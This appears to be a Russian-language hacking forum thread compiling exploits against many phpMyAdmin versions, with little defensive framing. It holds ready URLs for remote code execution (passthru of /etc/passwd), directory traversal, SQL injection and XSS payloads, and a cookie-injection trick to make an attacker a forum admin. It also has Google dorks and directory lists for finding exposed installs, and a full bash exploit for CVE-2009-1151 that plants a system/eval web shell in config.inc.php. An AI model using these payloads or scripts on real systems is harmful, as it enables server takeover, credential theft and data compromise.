Vulnerability 2.2.0rc3 http://victim/phpmyadmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK=".passthru('cat%20/etc/passwd')." Эксплоит дает выполнение произвольного кода. 2.3.2 http://target.com/phpMyAdmin/tbl_properties_structure.php?lang=<SQL INJECTION> SQL-injection 2.5.* phpMyAdmin 2.5.7 Remote code injection Exploit Эксплоит дает выполнение произвольного кода. 2.5.5-pl1 and prior http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00 Эксплоит дает чтение файла / выполнение произвольного кода. 2.6.4-pl1 phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit Эксплоит дает чтение любого фала. HTML-Exploit: HTML: <CENTER> <A HREF="http://www.securityreason.com><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P> <FORM action="http://74.69.111.236:4681/phpmyadmin/libraries/grab_globals.lib.php" method=post enctype="multipart/form-data"> <input TYPE="hidden" name="usesubform[1]" value="1"> <input TYPE="hidden" name="usesubform[2]" value="1"> <input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p> <input TYPE="hidden" name="subform[1][cXIb8O3]" value="1"> <input TYPE="submit" value="Exploit"> </FORM> 2.7.0 http://victim/phpmyadmin/server_privileges.php?server=1&checkprivs=' http://victim/phpmyadmin/server_privileges.php?server=1&hostname='&username=1&dbname=1&tablename=1 SQL-injection 2.11.2 SQL-injection + XSS Code: 12 ноября, 2007 Программа: phpMyAdmin 2.11.2, возможно более ранние версии Опасность: Низкая Наличие эксплоита: Нет Описание: Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения. 1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "db" в сценарии db_create.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Для успешной эксплуатации уязвимости атакующий должен иметь привилегии CREATE DATABASE и браузер жертвы должен выполнять JavaScript код в теге img (например, Opera). 2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "db" в сценарии db_create.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Для успешной эксплуатации уязвимости атакующий должен иметь привилегии CREATE DATABASE. other: http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00 http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00 http://www.example.com/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3 http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No XSS (Cross-site Scripting) : 2.6.0-pl2 and prior http://[target]/[phpMyAdmin_directory]/main.php?"><script>alert(document.cookie)</script></ http://[target]/[phpMyAdmin_directory]/read_dump .php?sql_query=set%20@1=1&zero_rows=<script>alert(document.cookie)</script> prior to 2.6.2-rc1 http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><sc ript>alert(document.cookie)</script> http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1> 2.8.0.1 http://example.com/?convcharset=%22%20STYLE=%22background-image:%20url(javascript:alert('XSS'))%22%20r=%22 index.php?set_theme=%3Cscript%3Ealert('Powered By Expaethitec');%3C/script%3E 2.9.x http://site.com/phpmyadmin/sql.php?db=information_schema& token=your_token&goto=db_details_structure.php&table=CHARACTER_SETS&pos=[xss] other: Code: http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code] http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code] http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code] http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code] http://www.example.com/phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS] http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS] /phpmyadmin/db_create.php?token=your_token&reload=1&db=[double xss(2 followed xss)] /phpmyadmin/db_operations.php?db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss] /phpmyadmin/querywindow.php?token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss] Full path disclosure : /scripts/check_lang.php /themes/darkblue_orange/layout.inc.php /index.php?lang[]= /index.php?target[]= /index.php?db[]= /index.php?goto[]= /left.php?server[]= /index.php?table[]= /server_databases.php?token=your_token&sort_by=" /index.php?db=information_schema&token=your_token&tbl_group[]= /db_printview.php?db=" /sql.php?back[]= libraries/string.lib.php libraries/storage_engines.lib.php libraries/sqlparser.lib.php libraries/sql_query_form.lib.php libraries/select_theme.lib.php libraries/select_lang.lib.php libraries/relation_cleanup.lib.php libraries/left_header.inc.php libraries/import.lib.php libraries/header_meta_style.inc.php libraries/grab_globals.lib.php libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo) libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo) libraries/display_import.lib.php libraries/display_export.lib.php libraries/display_create_table.lib.php libraries/display_create_database.lib.php libraries/db_table_exists.lib.php libraries/database_interface.lib.php libraries/common.lib.php libraries/check_user_privileges.lib.php libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true) libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE) libraries/import/sql.php libraries/fpdf/ufpdf.php libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true) dork: Code: inurl:main.php phpMyAdmin inurl:main.php Welcome to phpMyAdmin intitle:"index of/phpmyadmin" phpMyAdmin "running on" inurl:"main.php" phpMyAdmin dumps "phpMyAdmin" "running on" inurl:"main.php" filetype:txt | filetype:sql ("phpMyAdmin SQL Dump"|"phpMyAdmin MySQL-Dump") intitle:"index of /phpmyadmin" -tar allinurl:/tbl_properties_structure.php? inurl:main.php "Welcome to phpMyadmin" -"No Privileges" +"runtime" -"as root@" http://www.google.com/search?hl=en&lr=&c2coff=1&q=intext:"welcome to phpmyadmin" -login -"no privileges" "Create new database [Documentation]" inurl:phpmyadmin -demo Files locations Code: /phpm/ /phpmy/ /phpmyadmin/ /PMA/ /mysql/ /admin/ /db/ /dbadmin/ /web/phpMyAdmin/ /admin/pma/ /admin/phpmyadmin/ /admin/mysql/ /phpmyadmin2/ /mysqladmin/ /mysql-admin/ /phpMyAdmin-2.5.6/ /phpMyAdmin-2.5.4/ /phpMyAdmin-2.5.1/ /phpMyAdmin-2.2.3/ /phpMyAdmin-2.2.6/ /myadmin/ /phpMyA/ /phpmyad/ /phpMyAdmin-2.6.0/ /phpMyAdmin-2.6.0-pl1/ /phpMyAdmin-2.6.3-pl1/ /phpMyAdmin-2.6.3/ /phpMyAdmin-2.6.3-rc1/ /phpMyAdmin-2.6.2-rc1/ /phpMyAdmi/ /phpMyAdmin1/ /phpMyAdmin2/ /phpMyAdmin-2/ /phpMyAdmin-2.10.0/ /phpMyAdmin-2.3.0/ /phpMyAdmin-2.3.1/ /phpMyAdmin-2.3.2/ /phpMyAdmin-2.3.3/ /phpMyAdmin-2.3.4/ /phpMyAdmin-2.3.5/ /phpMyAdmin-2.3.6/ /phpMyAdmin-2.3.7/ /phpMyAdmin-2.3.8/ /phpMyAdmin-2.3.9/ /phpMyAdmin-2.4.0/ /phpMyAdmin-2.4.1/ /phpMyAdmin-2.4.2/ /phpMyAdmin-2.4.3/ /phpMyAdmin-2.4.4/ /phpMyAdmin-2.4.5/ /phpMyAdmin-2.4.6/ /phpMyAdmin-2.4.7/ /phpMyAdmin-2.4.8/ /phpMyAdmin-2.4.9/ /phpMyAdmin-2.5.0/ /phpMyAdmin-2.5.1/ /phpMyAdmin-2.5.2/ /phpMyAdmin-2.5.3/ /phpMyAdmin-2.5.4/ /phpMyAdmin-2.5.5/ /phpMyAdmin-2.5.6/ /phpMyAdmin-2.5.7/ /phpMyAdmin-2.5.8/ /phpMyAdmin-2.5.9/ /phpMyAdmin-2.6.0/ /phpMyAdmin-2.6.1/ /phpMyAdmin-2.6.2/ /phpMyAdmin-2.6.3/ /phpMyAdmin-2.6.4/ /phpMyAdmin-2.6.5/ /phpMyAdmin-2.6.6/ /phpMyAdmin-2.6.7/ /phpMyAdmin-2.6.8/ /phpMyAdmin-2.6.9/ /phpMyAdmin-2.7.0/ /phpMyAdmin-2.7.1/ /phpMyAdmin-2.7.2/ /phpMyAdmin-2.7.3/ /phpMyAdmin-2.7.4/ /phpMyAdmin-2.7.5/ /phpMyAdmin-2.7.6/ /phpMyAdmin-2.7.7/ /phpMyAdmin-2.7.8/ /phpMyAdmin-2.7.9/ /phpMyAdmin-2.8.1/ /phpMyAdmin-2.8.2/ /phpMyAdmin-2.8.3/ /phpMyAdmin-2.8.4/ /phpMyAdmin-2.8.5/ /phpMyAdmin-2.8.6/ /phpMyAdmin-2.8.7/ /phpMyAdmin-2.8.8/ /phpMyAdmin-2.8.9/ /phpMyAdmin-2.9.1/ /phpMyAdmin-2.9.2/ /phpMyAdmin-3/ /phpMyAdmin-4/ /phpMyAds/ /phpmyad-sys/ phpMyAdmin security announcement
SQL injection (Delayed Cross Site Request Forgery) <=v2.11.5 Пример использования: У нас имеется сайт на котором стоит phpmyadmin (кстати не особо важно даже где, главное чтоб стоял и админ в него заходил), форум (для примера ipb) и скрипт подверженный активной xss (для примера возьмём теоретическую активку в пм ipb). Отправляем админу кодес с xss (важно знать префикс используемый на форуме). Кодес: PHP: <script> document.cookie="sql_query=update ibf_members set mgroup=4 where id=31337; path=/; expires=Mon, 01-Jan-2009 00:00:00 GMT"; </script> ibf_ - префикс форума 4 - админская группа 31337 - наш id на форуме После "заражения" xss'кой админа остаётся только ждать когда он зайдёт в phpmyadmin. Там уже выполняемый админом sql запрос перепишется и сделает нас админом форума (при данном значении параметра sql_query). Для беспалевности можно "поиграть" с параметром expires. [size=-100]PS на данный момент уязвимости подвержены практически все пхпмайадмины (не успели обновиться, бгг)) [/size]
еще пару XSS, в версии 2.6.1 работают, последние версии не уязвимы: Code: http://site/phpMyAdmin/index.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script> Code: http://site/phpMyAdmin/calendar.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script> и т.д. register globals и magic qoutes неважны Code: http://localhost/Tools/phpMyAdmin/mult_submits.inc.php?submit_mult=1&what=1&strDoYouReally=<script>alert(5555)</script> register_globals on поидее и в последних версиях этот скрипт уязвим, но он перенесен в libraries и немного изменен, в 2.11.5 эксплуатируется так: Code: http://localhost/Tools/phpMyAdmin/libraries/mult_submits.inc.php?submit_mult=1&what="><script>alert(5555)</script> но помоему в последних версиях по умолчанию доступ к скрипту запрещен, с помощью .htaccess
It is a variable that was not cleaned in a way, allowing you to inject SQL code into the cookie. Here is a example of a small vulnerable php script. PHP: <?php $user['id'] = $_COOKIE['uid']; $query = "SELECT name, password FROM members where uid='" . $user['id'] . "'"; $query = mysql_query($query); $name = mysql_result($query, 0); echo 'Hello ' . $name . '!'; ?> If it is a normal user, it would display a perfectly good name like "Hello Admin!". You can now use a thing such the extention for firefox called Cookie Editor, and modify the cookie, you can also do this with javascript. You then edit the cookie's value, it would have been something like "12", but after editing and adding sql code to it, it would be something like "-1 UNION ALL SELECT USER(), NULL FROM mysql.user--". That will change the query, and display the user connected to the database, instead of the name of the user stored in the database. That will result in the following being echo'd; "Hello root@localhost". (c) h4cky0u
Vulnerable: Code: Typo3 phpMyAdmin 3.2 Typo3 phpMyAdmin 3.0.1 Typo3 phpMyAdmin 3.0 Typo3 phpMyAdmin 0.2.2 Turbolinux Appliance Server 3.0 x64 Turbolinux Appliance Server 3.0 phpMyAdmin phpMyAdmin 2.11.9 phpMyAdmin phpMyAdmin 2.11.8 phpMyAdmin phpMyAdmin 2.11.7 phpMyAdmin phpMyAdmin 2.11.5 1 phpMyAdmin phpMyAdmin 2.11.5 phpMyAdmin phpMyAdmin 2.11.4 phpMyAdmin phpMyAdmin 2.11.1 phpMyAdmin phpMyAdmin 2.9.1 phpMyAdmin phpMyAdmin 2.9.2-rc1 phpMyAdmin phpMyAdmin 2.9.1.1 phpMyAdmin phpMyAdmin 2.11.8.1 phpMyAdmin phpMyAdmin 2.11.5.2 phpMyAdmin phpMyAdmin 2.11.2.2 phpMyAdmin phpMyAdmin 2.11.2.1 phpMyAdmin phpMyAdmin 2.11.1.2 phpMyAdmin phpMyAdmin 2.11.1.1 phpMyAdmin phpMyAdmin 2.10.0.2 phpMyAdmin phpMyAdmin 2.10.0.1 phpMyAdmin phpMyAdmin 2.10.0.1 Exploit: Code: http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token] Выполнение произвольного PHP-кода на сервере, включая вызов внешних команд через PHP-функцию exec(). Решение: Upgrade to phpMyAdmin 2.11.9.1 or newer. Not Vulnerable: Code: Typo3 phpMyAdmin 3.3 phpMyAdmin phpMyAdmin 2.11.9 .1 www.phpmyadmin.net
phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability ______________________ http://www.milw0rm.com/exploits/7382
2.10.0.2 XSS Code: [CODE]http://[server]/main.php?reload=1&message=aa&sql_query=[B][XSS][/B]&token=[B][SID][/B] Code: http://[server]/main.php?reload=1&message=aa&sql_query=[B][XSS][/B]&token=[B][SID][/B] Code: http://[server]/server_privileges.php?token=[B][SID][/B]&username=[B][XSS] [/B] Code: http://[server]/server_privileges.php?token=[B][SID][/B]&username=[B][XSS][/B] Code: http://[server]/sql.php?db=information_schema&token=[B][SID][/B]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[B][XSS][/B] Code: http://[server]/sql.php?db=information_schema&token=[B][SID][/B]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[B][XSS][/B] Code: http://[server]/sql.php?db=boutique&table=categories&token=[B][SID][/B]&pos=0&session_max_rows=30[B][XSS][/B]& disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories` Code: http://[server]/sql.php?db=boutique&table=categories&token=[B][SID][/B]&pos=0&session_max_rows=30[B][XSS][/B]& disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories` Code: http://[server]/tbl_export.php?db=boutique&table=categories&token=[B][SID][/B]&pos=0&session_max_rows=30& disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[B][XSS][/B] Code: http://[server]/tbl_export.php?db=boutique&table=categories&token=[B][SID][/B]&pos=0&session_max_rows=30& disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[B][XSS][/B] Code: http://[server]/tbl_export.php?db=boutique&table=categories&token=[B][SID][/B]&pos=0&session_max_rows=30& disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[B][XSS][/B]&unlim_num_rows=4&single_table=true Code: http://[server]/tbl_export.php?db=boutique&table=categories&token=[B][SID][/B]&pos=0&session_max_rows=30& disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[B][XSS][/B]&unlim_num_rows=4&single_table=true Code: http://[server]/tbl_export.php?db=boutique&table=categories&token=[B][SID][/B]&pos=0[B][XSS][/B]&session_max_rows=30& disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4& single_table=true Оригинал: http://downloads.securityfocus.com/vulnerabilities/exploits/25268.html
Еще бы добавил: Работает на мускуле 4 На 5 - не работает. По крайней мере у меня. ТОлько что протестил.) (хорошо что там где надо стоит 4))))
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit Code: #!/bin/bash # CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11 # by pagvac (gnucitizen.org), 4th June 2009. # special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln, # and to str0ke (milw0rm.com) for testing this PoC script and providing feedback! # PoC script successfully tested on the following targets: # phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1 # Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2) # attack requirements: # 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5 # and 3.x before 3.1.3.1 according to PMASA-2009-3 # 2) it *seems* this vuln can only be exploited against environments # where the administrator has chosen to install phpMyAdmin following # the *wizard* method, rather than manual method: http://snipurl.com/jhjxx # 3) administrator must have NOT deleted the '/config/' directory # within the '/phpMyAdmin/' directory. this is because this directory is # where '/scripts/setup.php' tries to create 'config.inc.php' which is where # our evil PHP code is injected 8) # more info on: # http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php # http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/ if [[ $# -ne 1 ]] then echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>" echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/" exit fi if ! which curl >/dev/null then echo "sorry but you need curl for this script to work!" echo "on Debian/Ubuntu: sudo apt-get install curl" exit fi function exploit { postdata="token=$1&action=save&configuration="\ "a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\ "%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\ "%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\ "%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\ "%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix" postdata2="token=$1&action=save&configuration=a:1:"\ "{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\ "%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\ "system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\ "if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\ "(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\ "%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\ "mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\ "%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\ "%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix" flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html" echo "[+] attempting to inject phpinfo() ..." curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null then curl -ks --url "$3/config/config.inc.php" >$flag echo "[+] success! phpinfo() injected successfully! output saved on $flag" curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:" echo " $3/config/config.inc.php?c=ls+-l+/" echo " $3/config/config.inc.php?p=phpinfo();" echo " please send any feedback/improvements for this script to"\ "unknown.pentester<AT_sign__here>gmail.com" else echo "[+] no luck injecting to $3/config/config.inc.php :(" exit fi } # end of exploit function cookiejar="/tmp/$(basename $0).$RANDOM.txt" token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12` echo "[+] checking if phpMyAdmin exists on URL provided ..." #if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null if grep phpMyAdmin $cookiejar &>/dev/null then length=`echo -n $token | wc -c` # valid form token obtained? if [[ $length -eq 32 ]] then echo "[+] phpMyAdmin cookie and form token received successfully. Good!" # attempt exploit! exploit $token $cookiejar $1 else echo "[+] could not grab form token. you might want to try exploiting the vuln manually :(" exit fi else echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?" exit fi # milw0rm.com [2009-06-09]
CVE-2009-1151 (phpmyadminrcesh.txt) PMASA-2009-3 PMASA-2009-4 Code: <?php /* * Generated configuration file * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <[email protected]> * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $ * Date: Tue, 09 Jun 2009 14:13:34 GMT */ /* Servers configuration */ $i = 0; /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host']=[COLOR=White][b]''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'[/b][/COLOR]] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ ?> phpMyAdmin//config/config.inc.php?c=ls+-l+/ phpMyAdmin//config/config.inc.php?p=phpinfo(); Vulnerable software and versions: phpmyadmin:3.1.3 phpmyadmin:3.1.3:rc1 phpmyadmin:3.1.2 phpmyadmin:3.1.2:rc1 phpmyadmin:3.1.1 phpmyadmin:3.1.1:rc1 phpmyadmin:3.1.0 phpmyadmin:2.11.9.3 phpmyadmin:2.11.9.4 phpmyadmin:2.11.9.2 phpmyadmin:2.11.9.1 phpmyadmin:2.11.9.0 phpmyadmin:2.11.9 phpmyadmin:2.11.8 phpmyadmin:2.11.7.12.11.7.1 phpmyadmin:2.11.7.0 phpmyadmin:2.11.7 phpmyadmin:2.11.6:rc1 phpmyadmin:2.11.6.0 phpmyadmin:2.11.6 phpmyadmin:2.11.5:rc1 phpmyadmin:2.11.5.2 phpmyadmin:2.11.5.1 phpmyadmin:2.11.5.0 phpmyadmin:2.11.5 phpmyadmin:2.11.4:rc1 phpmyadmin:2.11.4 phpmyadmin:2.11.3:rc1 phpmyadmin:2.11.3.0 phpmyadmin:2.11.3 phpmyadmin:2.11.2.2 phpmyadmin:2.11.2.1 phpmyadmin:2.11.2.0 phpmyadmin:2.11.2 phpmyadmin:2.11.1:rc1 phpmyadmin:2.11.1.2 phpmyadmin:2.11.1.1 phpmyadmin:2.11.1.0 phpmyadmin:2.11.1 phpmyadmin:2.11.0:rc1 phpmyadmin:2.11.0:beta1 phpmyadmin:2.11.0
По поводу full path disclosure В последних версиях в корне пма есть файл phpinfo.php с соответствующем контентом и как правило админы его не удаляют
Files locations Code: /php-my-admin/ /phpMyAdmin-2.5.5-rc1/ /phpMyAdmin-2.5.5-rc2/ /phpMyAdmin-2.5.5-pl1/ /phpMyAdmin-2.5.6-rc1/ /phpMyAdmin-2.5.6-rc2/ /phpMyAdmin-2.5.7-pl1/ /phpMyAdmin-2.6.0-alpha/ /phpMyAdmin-2.6.0-alpha2/ /phpMyAdmin-2.6.0-beta1/ /phpMyAdmin-2.6.0-beta2/ /phpMyAdmin-2.6.0-rc1/ /phpMyAdmin-2.6.0-rc2/ /phpMyAdmin-2.6.0-rc3/ /phpMyAdmin-2.6.0-pl2/ /phpMyAdmin-2.6.0-pl3/ /phpMyAdmin-2.6.1-rc1/ /phpMyAdmin-2.6.1-rc2/ /phpMyAdmin-2.6.1/ /phpMyAdmin-2.6.1-pl1/ /phpMyAdmin-2.6.1-pl2/ /phpMyAdmin-2.6.1-pl3/ /phpMyAdmin-2.6.2-beta1/ /phpMyAdmin-2.6.2-pl1/ /phpMyAdmin-2.6.4-rc1/ /phpMyAdmin-2.6.4-pl1/ /phpMyAdmin-2.6.4-pl2/ /phpMyAdmin-2.6.4-pl3/ /phpMyAdmin-2.6.4-pl4/ /phpMyAdmin-2.7.0-beta1/ /phpMyAdmin-2.7.0-rc1/ /phpMyAdmin-2.7.0-pl1/ /phpMyAdmin-2.7.0-pl2/ /phpMyAdmin-2.8.0-beta1/ /phpMyAdmin-2.8.0-rc1/ /phpMyAdmin-2.8.0-rc2/ /phpMyAdmin-2.8.0/ /phpMyAdmin-2.8.0.1/ /phpMyAdmin-2.8.0.2/ /phpMyAdmin-2.8.0.3/ /phpMyAdmin-2.8.0.4/ /phpMyAdmin-2.8.1-rc1/ /sqlmanager/ /mysqlmanager/ /p/m/a/ /PMA2005/ /pma2005/ /phpmanager/ /php-myadmin/ /phpmy-admin/ /webadmin/ /sqlweb/ /websql/ /webdb/
По поводу уязвимости phpMyAdmin (/scripts/setup.php) PHP Code Injection добавлю что phpMyAdmin 2.8.x также уязвима. Проверял на phpMyAdmin 2.8.0.3 Главное чтобы права на запись были (
libraries/config.default.php PHP: $cfg['ShowPhpInfo'] = false; Все зависит от настроек. по дефолту выключено.
phpMyAdmin SQL bookmark HTML Injection Vulnerability Code: Bugtraq ID: 35543 Class: Input Validation Error CVE: CVE-2009-2284 Remote: Yes Local: No Published: Jun 30 2009 12:00AM Updated: Aug 21 2009 03:57PM Credit: Sven Vetsch Vulnerable: RedHat Fedora 9 0 RedHat Fedora 11 RedHat Fedora 10 phpMyAdmin phpMyAdmin 3.1.1 1 phpMyAdmin phpMyAdmin 3.1.1 0 phpMyAdmin phpMyAdmin 3.1 0 phpMyAdmin phpMyAdmin 3.0.1 phpMyAdmin phpMyAdmin 3.0 phpMyAdmin phpMyAdmin 3.2.0-rc1 phpMyAdmin phpMyAdmin 3.1.3.2 phpMyAdmin phpMyAdmin 3.1.3.1 phpMyAdmin phpMyAdmin 3.0.1.1 MandrakeSoft Enterprise Server 5 x86_64 MandrakeSoft Enterprise Server 5 Эксплойта или более конкретного описания в инете не нашел. Покопался сам: Code: /sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E
Раскрытие путей phpMyAdmin 2.6.1 Code: http://localhost/Tools/phpMyAdmin/server_variables.php?lang=ru-win1251&server=1&collation_connection=' Code: Fatal error: Call to undefined function PMA_reloadNavigation() in Z:\home\l calhost\www\Tools\phpmyadmin\header.inc.php on line 132 Уязвимая часть : PHP: function PMA_reloadNavigation() { global $cfg; // Reloads the navigation frame via JavaScript if required if (isset($GLOBALS['reload']) && $GLOBALS['reload']) { echo "\n"; $reload_url = './left.php?' . PMA_generate_common_url((isset($GLOBALS['db']) ? $GLOBALS['db'] : ''), '', '&'); ?> <script type="text/javascript" language="javascript1.2"> <!-- if (typeof(window.parent) != 'undefined' && typeof(window.parent.frames['nav']) != 'undefined') { window.parent.frames['nav'].goTo('<?php echo $reload_url; ?>&hash=' + <?php echo (($cfg['QueryFrame'] && $cfg['QueryFrameJS']) ? 'window.parent.frames[\'queryframe\'].document.hashform.hash.value' : "'" . md5($cfg['PmaAbsoluteUri']) . "'"); ?>); } //--> </script> <?php unset($GLOBALS['reload']); } } UPD Code: http://localhost/Tools/phpMyAdmin/footer.inc.php Code: Notice: Undefined variable: cfg in Z:\home\localhost\www\Tools\phpmyadmin\footer.inc.php on line 17 Уязвимый код: PHP: <?php /* $Id$ */ // vim: expandtab sw=4 ts=4 sts=4: /** * WARNING: This script has to be included at the very end of your code because * it will stop the script execution! */ require_once('./libraries/relation.lib.php'); // for PMA_setHistory() /** * Query window */ // If query window is wanted and open, update with latest selected db/table. if ($cfg['QueryFrame'] && $cfg['QueryFrameJS']) { ?> Code: http://localhost/Tools/phpMyAdmin/mult_submits.inc.php Code: Fatal error: Call to undefined function PMA_DBI_select_db() in Z:\home\localhost\www\Tools\phpmyadmin\mult_submits.inc.php on line 385 Уязвимый код: PHP: if ($run_parts) { $sql_query .= $a_query . ';' . "\n"; if ($query_type != 'drop_db') { PMA_DBI_select_db($db); } $result = @PMA_DBI_query($a_query) or PMA_mysqlDie('', $a_query, FALSE, $err_url); } // end if } // end for if ($use_sql) { require('./sql.php'); } elseif (!$run_parts) { PMA_DBI_select_db($db); $result = PMA_DBI_query($sql_query); } } ?> (C)Xcontrol212
